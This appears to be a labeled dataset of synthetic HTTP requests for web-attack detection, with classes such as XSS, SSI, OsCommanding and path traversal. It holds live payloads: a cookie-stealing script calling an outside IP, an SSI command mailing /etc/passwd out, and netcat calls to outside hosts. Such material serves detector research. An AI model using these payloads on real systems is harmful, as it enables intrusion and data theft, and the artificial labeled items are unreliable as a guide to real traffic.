eX3XrY%uGEsN=mshoulqmsDc3p9&noR@xl4=sh%28O%2Bti%3FnYU%40i86&nou=24&ANeughmnmixsesc=412943961&an=%3Ci%26-%3D&lLnode3nHL.OY9R=nwjbutdh+Nnyl+&poetVSrowGha=e%7C&oPnneaLlax=cTAfvS&y0hatDtoyy=8307&@9unionXPYprocessing-instructionXZ8=437&etmahh2dw8tosgo=ets1T&X3@T=rbVL&alpurt=0482781

End - Id: 50032
Start - Id: 45982
class: PathTransversal
PUT /auxG96wTL/hLprpltugejRodaochw.php? HTTP/1.1
Content-Length: 241
Content-Language: Eeeievsb,Ntnoifrn,4Imlwr4t
Content-Encoding: gzip
Content-Location: http://www.9eert.gov/uphzmpe.asmx
Content-MD5: RHJlYXJuaE93ZXhnZXVvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 08 Feb 07 12:27:01 GMT
Last-Modified: Mon, 05 Apr 04 23:16:01 CET
Host: www.r6i0ahte4.com
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8;q=0.3, windows-1250;q=0.0, x-mac-chinesetrad;q=0.1, windows-1250, iso-8859-4
Accept-Encoding: *;q=0.9
Accept-Language: f:\winnt\boot.ini
Cache-Control: only-if-cached
Client-ip: 121.84.201.116
Cookie: nkth=l3opttwead$1ua;salhzhtthnM9s=7082503837;egeaa=3756662862;rordtsHpN2idua4=9908;ravRmIwaoUptCC=processing-instructioneg&&;phguhtdl=yinsertLsce'etas:asun
Cookie2: $Version="1"
Date: Sun, 04 Nov 07 23:58:17 UTC
ETag: W/"hfrms3FDNZktwdG2Zu8"
Expect: nr6h=isbahi
From: lapnn@rne0nheDa.de
If-Modified-Since: Mon, 26 Mar 07 12:02:21 UTC
If-Unmodified-Since: Wed, 27 Aug 08 18:09:35 UTC
If-Match: *
If-None-Match: "2P4aRRxPJRQ4DYYfFbL"
If-Range: Sun, 12 Aug 07 17:23:15 GMT
Max-Forwards: 00
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic SXVlTzpvZTlvSXQx
Authorization: NTLM ZXNydGxuZWR5dHVuZUpjdGNpQTFuaXRlcEhEMW9yazlxNW5zcWF0eWFsYW5ucGx0
Range: 645487-,-9584,58622-
Referer: http://btEadt8m.ch/0pt9e/oNaaeth/aril/e3lirgh/stldfaoa.pl
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: hwbtstFreytttoi
UA-CPU: StrongARM
UA-Disp: 548,5164,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 548x253
Via: 1.6 43.115.114.60, HTTP/2.5 www.wdn09.gif:6303, 6.2 244.11.133.107:304
Transfer-Encoding: gzip
Upgrade: aecn/5.8, CMno/3.6, r4lre/4.3
Warning: 392 248.155.194.89 "olpeyotcyYya" "Sun, 14 Aug 05 03:35:30 UTC"
X-Forwarded-For: 87.224.179.54
X-Serial-Number: 466621533909615
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

naieaoeario3=hi&6rhoaaaei5ht=2772&nerfrn=8970703&lieo=rtegUOb&futtbihclto9cn=ifofra&j290=32&eatioyi=hG&uh=38802&n1neflhH=8994832125&Rndsjm=EhhreWaQriefnmTe69&oh0NHtto=thb+lr&fi8nrctsearWt=4599&oahaiei3f=glt&%u.7httpsB7USOdfg=75888&njeqss=584

End - Id: 45982
Start - Id: 46869
class: XSS
POST /rnJeIvGvGcHGb_C1.i/ntagnwitpdew/u9lSlics/ax0DR3wv3M0./FEnt1LV-9xp_kJnetcat/E2tu5/edhtxptseCortflem8rW/taqlM85E.css? HTTP/1.1
Content-Length: 146
Content-Language: 2qe6e
Content-Encoding: identity
Content-Location: /ioohpohr.zip
Content-MD5: cnNmc0ViNXQ1MWFLaXJTdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Apr 09 06:58:40 GMT
Last-Modified: Wed, 20 Jul 05 02:58:45 UTC
Host: 113.140.18.187
Connection: 1beaucA
Accept: audio/*, text/xml
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: Ran-Riio4o;q=0.0, 6Aalna-e;q=0.3, tratuji-Hi;q=0.8
Cache-Control: te=No
Client-ip: 74.208.49.31
Cookie: nmaiaol1tn=7365;seen=t;kue9i=nSfsCqgjG
Cookie2: $Version="36"
Date: Wed, 21 Sep 05 14:58:08 UTC
ETag: "ynNtDqxUiypefBzDU"
Expect: 100-continue
From: xorersew@0i1thu.fr
If-Modified-Since: Tue, 03 Feb 04 16:38:02 CET
If-Unmodified-Since: Fri, 08 Apr 05 02:04:25 UTC
If-Match: *
If-None-Match: "Z_2PyHiv3JhHR73_N"
If-Range: Thu, 10 Jan 08 13:10:37 CET
Max-Forwards: 128
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: Digest uri=/ioptabs/frdsoAN/sEhe7/Ittfram8.mpg
Range: 6262-,10870-70169
Referer: /harseb/tlkpo4lN.asp
TE: deflate;q=0.0,trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.5 (Machintosh; U; PPC Mac OS X 1.0; zS-sp; rv:1.1.3) Gecko/49716822
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: HTTP/9.0 www.eamt.htm
Transfer-Encoding: gzip
Upgrade: Btglc/3.9, rreo/8.4
Warning: 910 www.aqeeeiu.htm "tjdShea8TwiOuAu" "Mon, 12 May 08 02:53:43 CET"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

ibnpel3nfiitt=<img+src=javascript: alert('hsrer.ursnri')  >&hhpneteeetof5=>s&hrazpe=1&aeu=uxrmetariaipassthru>UEhls><tin

End - Id: 46869
Start - Id: 47699
class: XSS
GET /ilog/t3T.js?hpnge=%3Cdiv++++onmouseover++%3D++%22+%5Bwindow.open%28%27http%3A%2F%2F74.81.53.139%2Fngro.exe%27%2Bdocument.cookie%29%3B%5D+++%22++++%3E HTTP/1.1
Host: www.rdTeAc.it
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-icelandic, shift_jis;q=0.0, koi8-r;q=0.0
Accept-Encoding: identity
Accept-Language: 1sve-ltteostw;q=0.9, Deer-edy;q=0.2, gofet-el;q=0.1
Cache-Control: max-age=9217
Client-ip: 29.159.169.244
Cookie: we3eoe2raectd=4
Cookie2: $Version="6"
Date: Wed, 28 Jan 09 03:10:08 GMT
ETag: "eymgqpKzdWID58x"
Expect: 100-continue
From: ntca1@4fmcsegl.gov
If-Modified-Since: Fri, 25 Mar 05 03:18:43 UTC
If-Unmodified-Since: Thu, 10 Feb 05 05:28:37 CET
If-Match: "wXI3e.h9C7SyKpllUh"
If-None-Match: "rU@.2AWJWkPMQAD3"
If-Range: *
Max-Forwards: 1913
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM b3Q2OWN3aXJkc2xycmhyaGVldGRpYXg0c2llZHR1bmhqdEdvZnNoZWhy
Authorization: Basic dG9wczppd25PSWllYw==
Range: 834-
Referer: http://u1ba2lt.gov/r6aruoea/tyeyh/heesj/rrokczs/onokotc.rar
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/1.0 (compatible; MSIE 9.6; Linux i586; pth1diafl)
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5167x472
Via: 2.7 4.71.32.4, HTTP/4.6 119.189.227.71, is4op/9.4 www.igdH.css
Transfer-Encoding: eo6rT; aceaAthf=wueou9
Upgrade: 4Siht/2.2
Warning: 422 www.tsahzte.tiff "ndnheiEmueo" "Fri, 27 Jan 06 13:37:13 GMT"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 00056552698
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47699
Start - Id: 45292
class: PathTransversal
GET /ubesioUoneyht7o.html?aohn=36&MpuiiAdhu=jmR4yuya%7E%5De&icltinota8ra=xtermenet&ihgsaRondu=6&ratecedwkt=eio&aoaip1thiE2dse=ry&sa3Eloeogees2=14&naa=sedi8fu0ebk+n&ax4rfpsoa4hCrl=hkjucwVJAMyM&7h2EglwOberabdn=enodeclr3oy%3B HTTP/1.1
Host: 17.62.141.29
Connection: 2datab
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesesimp, koi8-r;q=0.2, x-mac-korean;q=0.2, ks_c_5601-1987;q=0.5, windows-1257
Accept-Encoding: \autoexec.bat
Accept-Language: *
Cache-Control: no-store
Date: Wed, 05 Jan 05 02:25:03 UTC
ETag: "RUC6_eMpGbZsMGv2eAP"
Expect: eeun
If-Modified-Since: Sat, 25 Sep 04 16:55:16 UTC
If-Unmodified-Since: Sat, 09 May 09 10:45:35 GMT
If-Match: "hV8ODVg8QVtMkmg4KH2"
If-None-Match: "vy26I@I4OMlfY.MxNNn"
If-Range: *
Max-Forwards: 65
Pragma: m5o1='sre'
Referer: http://bnutA.gov/seSa4rit/wnos/ltohw.tiff
TE: gzip,chunked;q=0.0
User-Agent: fee2steel (cYHS-55nCr; s0@Ieyf)
UA-OS: Win95
Via: 1.5 155.33.83.77, 5.8 58.181.76.38:8
Transfer-Encoding: 3rsg; mitm=gupwodl
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 45292
Start - Id: 40223
class: SSI
PUT /oo6sEoslir0m6We/cQB@vb/dnukxOoTvMastN/ewsTSM/EW-Ca0B32/6rZjfWrM0/g0EPROR3SedFb7eroY/in1g.js? HTTP/1.0
Content-Length: 191
Content-Language: SAhhpbe
Content-Encoding: deflate
Content-Location: http://estoa.com/N0oettj/ionymeir/srar4hN/lnar8.jsp
Content-MD5: eTRmaG82aGFlb2RoZDBsTw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Nov 08 07:20:53 UTC
Last-Modified: Sat, 03 Jun 06 24:39:29 UTC
Host: 146.175.168.114:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-korean;q=0.6
Accept-Encoding: gzip;q=0.1, gzip, compress;q=0.0, compress;q=0.5, gzip
Accept-Language: 0oe-euof;q=0.8, Iwi-tYlalo, Afrni5k-imcihcc
Cache-Control: no-transform
Cookie: oxtshoqteijgit0=eade9 e<stm@h;lerhtoa5=<!-- #exec   cmd="/bin/mail    rto.com  <   /etc/passwd"-->
Cookie2: $Version="8"
Date: Sat, 24 Apr 04 23:57:33 CET
ETag: "fEdZbQu8So3oNKR"
Expect: 100-continue
If-Modified-Since: Tue, 25 Dec 07 20:52:33 UTC
If-Unmodified-Since: Sat, 16 Oct 04 16:00:27 GMT
If-Match: "SuFz34gu8pm0UQJ"
If-None-Match: "NxCJPHXj3x814kfWGGP_"
If-Range: Thu, 20 Apr 06 06:20:19 CET
Max-Forwards: 3025
Pragma: no-cache
Proxy-Authorization: Digest uri=http://aihy.be/db2cka/a0efeDut/seofi.jpg
Authorization: NTLM Z2hkaXZ3NHVhdG9kRXJsYWVleGlubExuOWhha2RPcnRvb3RoYWZ0eTI4YzFm
Range: 92-76626,-676357,-5
Referer: http://www.Otg1shI.gov/sio3ai/HN1gi/mt2niPa/xehsf.wmn
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: hFIETv http://www.dbsak.ch
UA-CPU: StrongARM
UA-Disp: 188,2764,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 581x7993
Via: FTP/8.1 www.eTorlD.jpg, pzE/9.9 www.topIong.css
Transfer-Encoding: gzip
Upgrade: lapei/3.4, naiR04/1.2, tnt/2.4, Ahn/9.3
Warning: 235 www.l3drtrep.htm "e1psdhsUdexftp" "Wed, 18 Nov 09 09:56:11 GMT"
X-Serial-Number: 605528313919
----: ----------------------------------

heakdsLCe=139759&imgZstdinHS=ihd:2wwa&hnevrwuargTlood=29381729&khrTesepeo7ghn=tmprs-4N5unionen<e%&ydl=319812&arB0prothoeere=ad2oPH&Oczttdrt=eTtxpTbb3hnoarao&jonm=628&4BXO4inlOM=26388111

End - Id: 40223
Start - Id: 48610
class: XPathInjection
POST /CJL/eTYZgKkKW_-o/zbmnn.zO@/vT2betweenY1/nclaitAeetftjtnis.jpeg? HTTP/1.1
Content-Length: 228
Content-Language: e,r9o
Content-Encoding: gzip
Content-Location: http://www.te2hhn.com/senE6i.wav
Content-MD5: b2VwOWxPcGN0eXVhdGxzNg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 21 Apr 04 16:42:09 CET
Last-Modified: Wed, 28 Dec 05 11:55:19 UTC
Host: www.vaiihrls.uk
Connection: keep-alive
Accept: image/png;q=0.7, application/*
Accept-Charset: gb2312;q=0.5, macintosh;q=0.3
Accept-Encoding: identity;q=0.4, compress, compress;q=0.9, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 149.85.188.117
Cookie: hHSesnesa=d091z;ih=atEedi- dsbn0n;sdit0hsai6meael=4777750981;gt7etoei=B7tt6;L9=ernph-tuhtar;sugs5si1hnsean=6042474
Cookie2: $Version="07"
Date: Sun, 15 Jun 08 15:34:30 CET
ETag: "pJxJ92AJ3eoiDG3vZ9"
Expect: o9huxcrn=u6an8;srief
From: oetv@ciasa9meg.net
If-Modified-Since: Tue, 25 Nov 08 10:20:34 CET
If-Unmodified-Since: Wed, 05 Jan 05 10:37:36 CET
If-Match: "TJbu0XyWf_7r3P9"
If-None-Match: "51DffmBOSGObR2BmGo."
If-Range: *
Max-Forwards: 674
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic ZWVpVDpoZGVvc0Fz
Authorization: Digest algorithm=hSolhe8f
Range: 3-574
Referer: http://www.nhNu.ch/tme9nH.jsp
TE: trailers,trailers,gzip
Trailer: Referer
User-Agent: woEs6gkaio/9.7
UA-CPU: Sparc
UA-Disp: 7774,1775,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 474x394
Via: 1.4 69.67.178.116:729
Transfer-Encoding: deflate
Upgrade: 98segm/6.0, emke/7.4, V6urw/1.6, y7u/6.3, erasgo/2.6
Warning: 405 60.173.106.50 "flsldMhforut" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 3403720047412746
----: ---------------------
~~~~~: ~~~~~~~~~~

8usock_stream0gFdm=+gugsamltuie-o&uetous4Dehz=1   or    count(path/child::node()[position()=((i+j+k+l+1)]   |   path/child::*()[position()=(k+1)])=1 or 915=

End - Id: 48610
Start - Id: 46367
class: PathTransversal
GET /ov7WFunPZt0xxf7ldd4y/eUkvitmeaasn/rlsynzgtg/eGJY-jY-gN5BVwRZaf/0ZC4d2Vas/NeoIi3Ioe/nM4g6yh/h8kendRjedple/Fl1odhI7qauaYs.js?gcmd1access_log9v_K@Z0=eysrshywpn&Nchnr=281846&fttbbextb6t=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2FNe.conf&Teaoml=oltf&eaolei=m0wGkdlsannosa&eZp.zv=0876814&B8oash=731&aehejiecesE=22163 HTTP/1.0
Host: 16.170.21.186
Connection: ndevvsy
Accept: image/png
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: o-2keqSqs5;q=0.3, iz-nnEoS, 4ei8se-iace17tg, 7aeo-nes;q=0.8, tipmassH-t55;q=0.7
Cache-Control: r1ey=tsp
Client-ip: 214.183.248.166
Cookie: g2=dwartbnaekls;7Sh64WF8rd=697577689
Cookie2: $Version="6"
Date: Sat, 19 Apr 08 03:38:14 GMT
ETag: W/"O6CVj03f@WFfucmV6x"
Expect: f4eai5=rspwo;urlr=7czuo
From: cewts@1fgr.fr
If-Modified-Since: Thu, 19 Jun 08 14:25:17 GMT
If-Unmodified-Since: Wed, 28 Apr 10 20:00:34 CET
If-Match: "c1IzCSR.5lgREbk.Y"
If-None-Match: "lous4WLlncNNBsyUDhP"
If-Range: "2YfWYEazuVfbd5r3"
Max-Forwards: 55
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: NTLM dUg5aXJFbW9odmxvZTJzeWV0ZTdhdGFkcjVhZGhzdHBFenl0bA==
Range: 2-1818,846125-
Referer: http://www.sehc38.be/a9tlne5.png
TE: trailers,trailers,chunked
Trailer: Expect
User-Agent: jzaq2 (dU-Bz4K; i2vF8g)
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 3216x516
Via: FTP/5.0 www.ekEdy.png, HTTP/1.8 www.Kawrss.css, 3.5 www.nrdeC9n.shtml
Transfer-Encoding: stg2; llfa=ecsm
Upgrade: ls17ea/6.1, if8/2.6, eEewts/0.2, pvyt/8.4
Warning: 298 47.169.61.113 "pr6idci4mnm8" "Fri, 15 May 09 02:27:43 UTC"
X-Forwarded-For: 241.79.66.180
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46367
Start - Id: 43198
class: OsCommanding
GET /j7-OJP0d.a/es_aTSWVO6fZtU/rrct/Topi/Lae8allkV.Igroup by5/tICBSK@iV6ONBt/xf7@N27hlNVTH.XT/t0Y0y.d.CwfGW006M7f/tHgN/24DOnb.css?iI2jt=4&ceh=%7Cid%253b HTTP/1.0
Host: 182.22.119.25
Connection: soco
Accept: application/rtf;q=0.6, video/quicktime
Accept-Charset: koi8;q=0.0, x-mac-roman, iso-2022-kr, x-mac-turkish
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-age=8873
Client-ip: 64.3.221.237
Cookie: 8NKlog=ji;XM0h9=27;mndhiocef=105;rlmwiUzhsiel=iLJ@Z1
Cookie2: $Version="9"
Date: Wed, 10 May 06 24:14:22 GMT
ETag: W/"ZrsNZ8DCH0PWd7.VuP.4"
Expect: 100-continue
From: eena@eaooz.de
If-Modified-Since: Thu, 18 Oct 07 15:20:57 GMT
If-Unmodified-Since: Mon, 19 Oct 09 19:05:18 GMT
If-Match: *
If-None-Match: "ILRIXSQ1HP8eRae@w"
If-Range: *
Max-Forwards: 4720
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: neeoh eyo1ad=huxteEf
Authorization: Basic Ymg2ZWJhOm5kbDhi
Range: -40670,4905-
Referer: /diiyz/ynlsxat/oTee/ohetbeef.cfm
TE: gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/8.4 (X11; U; Open BSD i386 1.3; wq-ln; rv:4.6.8) Gecko/17612982
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 953x846
Via: 3.1 186.185.116.79, 8.3 64.222.182.185:43778, Tvbnjw/3.2 114.32.90.7
Transfer-Encoding: gzip
Upgrade: hi11/1.2
Warning: 407 143.65.197.47 "assaq" 
X-Forwarded-For: 64.137.223.100
X-Serial-Number: 3512760212193
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43198
Start - Id: 43380
class: OsCommanding
GET /dhd6lajEu5AAqG/cFVKcI0dqw4Lcej_xCW/utlthec8spijrykh/mhEeydjpgsz/Roeeea0elliau/o19_aX.shtml?wbp3=%250a++++nc++www.detitora.com++80+++++%3B&tcgeicmro=ievjlej8qner&yarmistf=60166400&woweoi7ehdg7a=o1saadijiAuh1oL HTTP/1.1
Host: www.tslD5h7i.org
Connection: close
Accept: */*
Accept-Charset: euc-cn
Accept-Encoding: deflate;q=0.6, compress, identity
Accept-Language: tR-qtoeE, 3w-eemu;q=0.6, alee-toet;q=0.3
Cache-Control: max-age=34
Client-ip: 218.45.110.121
Cookie: @B1OFPmeHDH=2;coA4sEtfnsorlr=itnmetant(<;witqb
Cookie2: $Version="54"
Date: Sun, 27 Apr 08 02:15:57 UTC
ETag: W/"094MHSgefeJK4Vl5"
Expect: railv
From: no4b@rasantepan.ch
If-Modified-Since: Tue, 29 Sep 09 03:54:34 UTC
If-Unmodified-Since: Wed, 11 Jun 08 23:05:48 UTC
If-Match: "5fo-Bx0kQ@V316g-SUkK"
If-None-Match: *
If-Range: Mon, 24 Mar 08 15:48:53 UTC
Max-Forwards: 7
MIME-Version: 2.7
Pragma: jntdishi=r
Proxy-Authorization: Digest uri=http://www.aSgm.net/onpfm.pdf
Authorization: oradt j2ja=druuert
Range: -746384,775-
Referer: http://www.6snk2lp.uk/lBih/eH12.asp
TE: trailers,chunked,trailers
Trailer: Upgrade
User-Agent: OrerT/2.8
UA-CPU: PowerPC
UA-Disp: 5052,410,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9788x122
Via: 8.3 www.b2ltr5eo.shtml, 2.8 236.132.67.73, 8tV/8.8 www.st6ooNea.jpg
Transfer-Encoding: deflate
Upgrade: e8r/2.5, Otwtv/4.8, hhlyn4/7.3
Warning: 760 153.140.23.116 "tasreEom4" "Mon, 12 Apr 10 01:21:27 GMT"
X-Forwarded-For: 17.138.146.187
X-Serial-Number: 68319129
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43380
Start - Id: 37499
class: LdapInjection
GET /eE/eX0tcdL9YGIr3smv/e3TAtK66shX9.shtml?yaHe6aeANnr34=t3lM&8g9nvAoiwn=8474685212&6Rueebohln4j=387709&xp_q4kG7=o&aEzveh3a=w&eno=Anp%5CekEcteys&jeorbtizu=0713785&ewg=804161&ArlGher3i9=7601214&oL.1q0=aLx HTTP/1.1
Host: www.abTnL.st
Connection: close
Accept: */*
Accept-Charset: cp-936;q=0.6, x-mac-korean, cp-950;q=0.6, hz-gb-2312
Accept-Language: *;q=0.3
Cookie: ekeisnttT=98)(&(objectClass=m6s)(|(sn    =    ANd)(cn=ar     J*))
Date: Sat, 17 Jun 06 13:27:12 GMT
Expect: 100-continue
If-Unmodified-Since: Thu, 25 Jan 07 05:59:44 CET
Max-Forwards: 9786
Range: -02377,787126-
Referer: /tmNwnxdo/lstsg6cq/7ltap.css
User-Agent: Mozilla/5.7 (Machintosh; U; PPC 7.0; Rj-Ie; rv:8.6.1) Gecko/22241632
Via: 7.7 www.wizn.gif, 7.8 www.eaWj.html
X-Serial-Number: 222207

null

End - Id: 37499
Start - Id: 42925
class: OsCommanding
GET /Rnnydieame/vfEiframe/Ydeea0gZunuo/q6Xf-Z8R8TtDcMc1x/ia4e/E2otse4e2afS1lde/6zfz3sOGqCpX6b0NO/qechoXcGKr2BbU0/aehustt8xoptfmtrjl7s.nsf?cywindow.openWusr96V0T=cLenpRme%26t&esueof=jNysknHIZqxN&bGboot.inix@kQLU=98041501 HTTP/1.1
Host: www.ieefnat.cz
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-8859-1, x-mac-arabic
Accept-Encoding: |     /usr/bin/nc   -vvv 53.154.135.33 80%00
Accept-Language: *
Cache-Control: no-transform
Client-ip: 22.171.202.170
Cookie: neiym=72669002;aaedw7st=d$ naeru)ri<dy;evif3rqoe8a=osz il1aq7o+;gafpdth=CtzolaolinkoAt<ef;M3FZ_=(m
Cookie2: $Version="1"
Date: Thu, 08 Nov 07 17:01:16 CET
ETag: "5E.6ZDTdRKI89MzLURL"
Expect: 100-continue
From: oIteteaa@odaSo1YA.it
If-Modified-Since: Fri, 21 Jul 06 19:58:19 CET
If-Unmodified-Since: Tue, 24 Oct 06 17:10:48 CET
If-Match: "v4eyYj@Uf49ipyK.IEq"
If-None-Match: "3nCfw4UONXfj@0duRL"
If-Range: "vkwISyJp_eMW5fz5aE"
Max-Forwards: 2812
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic QWdkZWhUZzpoZUxvV3U=
Authorization: at5tn Dmlme=OlAtaNK
Range: 3-6521,8-,9454-87196
Referer: http://www.tbaAo.com/oeatAiH.mspx
TE: trailers,trailers,deflate;q=0.5
Trailer: If-Unmodified-Since
User-Agent: dolg2sih (iM@dBUFX62; mZkosgTnac; rdF9nfya)
UA-CPU: Sparc
UA-Disp: 3828,378,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 8266x6680
Via: 4.3 48.242.64.201
Transfer-Encoding: identity
Upgrade: olEofa/6.2, 8uc/9.8, mieh/1.6
Warning: 517 www.n1shrm.shtml "Ssehtmlmsep" "Sun, 25 Jul 04 01:49:30 GMT"
X-Forwarded-For: 15.151.59.253
X-Serial-Number: 740578265962
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42925
Start - Id: 49434
class: XPathInjection
GET /ib4B/tRV5MHvK/rdatmy7outaatRlEhseP/hse/itst4Esin2/dsms/Erqyi2oeqoDmnndt7eo/prlmJpin/aeOeddo/bo8leoeghgeo0t.bin?eoarr9ssReunhr=hcGBgAom-x&lNYX=tte7po%27+++or++++%28i+%3C+count%28iiO%2Fchild%3A%3Atext%28%29%29+++++and+j++%3C+++count%28ch%2Fchild%3A%3Acomment%28%29%29+and+k++%3C+count%28hncp%2Fchild%3A%3A*%29+++++%29+++or+%27tyhbh%27++++%3D++%27++wv2oo%27+++or&itoak=4hq4E&thilnrz=00Scacouhi&ppfditdoud6m=rcp8%5C&arssrEsBoopi=filikeo%3B&lcemqotsta=ah0tW9eewyi5&lihriliAie=eCy0NY&3frndMRde=7214&ohi5tn4=o_%40&Q4qPKON2S=chcTl+2sesev%3B&sjg2rttvlwwNnb=riTT&afecty=%25satSd&telgq=yem HTTP/1.1
Host: www.aEsakei7Hn.de
Connection: uf7ep
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=0
Client-ip: 64.61.159.147
Cookie: eelo=187588325;etZ3v=a4sb_9;oX1NZja60dkF=1915;etrh=lxK4HWs@;axevh=46012669
Cookie2: $Version="156"
Date: Mon, 29 Nov 04 07:10:18 UTC
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: a15tta=behdai;yearlc=mn7sjuc
From: poiter@eorm.biz
If-Modified-Since: Fri, 16 Mar 07 13:31:42 GMT
If-Unmodified-Since: Sat, 24 Oct 09 03:43:30 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Dec 05 22:53:27 UTC
Max-Forwards: 64
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic bm5hSGFhdDplbGwwbg==
Authorization: NTLM aG54eWh0TWRuY29kYWFhcmRlaWFhTjFldGJ0YW5pZmE=
Range: 60-32,32547-,55039-
Referer: http://eieuly.it/Zuhn/ttjLrw/2Wzj/iou2/uaa19eo.asp
TE: chunked,trailers
Trailer: Expect
User-Agent: oeiie2h/0.2
UA-CPU: StrongARM
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5208x110
Via: aYsnt/6.2 www.eto7.tiff, HTTP/4.9 www.0oteOpIe.js, 2.6 26.178.55.229:3
Transfer-Encoding: ofet; oyloye=ti7qs1
Upgrade: e0oOd/9.2, ouh2i/3.3, Ncur/2.5
Warning: 120 135.114.81.169 "7hhdTc" 
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49434
Start - Id: 39611
class: SSI
GET /aoen5rhfowpphvn/RA/TrGnsemnouhanEaG/aOvIB/leIevli.exe?br5enoeeuVwt9ri=50840042&ta=ae&9lENpNxtmhma=wrmh%28aRdsnitumt&J2Jj.B=%3C%21--+++%23include++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22--%3E&LyC5IY-Fd=a&dehsenuyAdsereq=yliieRnytei&wsno=1522343891 HTTP/1.0
Host: 114.79.136.252
Connection: tnnepq
Accept: audio/*;q=0.7, video/*, text/xml
Accept-Charset: *;q=0.8
Accept-Encoding: deflate
Accept-Language: gnelnbt-pneb, toun-RTsaoe;q=0.9, aowd-eaiam, mev-al;q=0.4
Cache-Control: no-store
Client-ip: 122.211.18.203
Cookie: Ii5hrihaa=j;a8d=%>;F9albaer2naaLte=65991643
Cookie2: $Version="679"
Date: Sat, 17 Jan 09 03:48:13 UTC
ETag: W/"IE2M@YnI7GUSNjVKUu_O"
Expect: 100-continue
From: ts3vhh@kqzfn.com
If-Modified-Since: Tue, 17 Jul 07 04:04:30 CET
If-Unmodified-Since: Fri, 18 May 07 20:11:32 UTC
If-Match: "ChW8iOJGeZL.0dq."
If-None-Match: *
If-Range: "08my99QpmNFuY_JTS2"
Max-Forwards: 7
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: yn3o7 beia=nuSE
Authorization: Digest qop=uncT
Range: 973-,-4,32221-
Referer: /zxdtig.avi
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.9 (X11; U; SunOS sun4u 5.8; Aj-e9; rv:9.4.7) Gecko/50679729
UA-CPU: PowerPC
UA-Disp: 150,287,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1841x260
Via: d2miyr/5.8 www.d0i3piEl.jpg, ldhnVo/8.5 220.160.63.121:47762
Transfer-Encoding: compress
Upgrade: i4uts/0.2, aesNA/6.1
Warning: 025 www.keet.tiff "mDUtinismbsS" "Thu, 13 May 04 10:01:27 GMT"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 224017819
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39611
Start - Id: 44943
class: PathTransversal
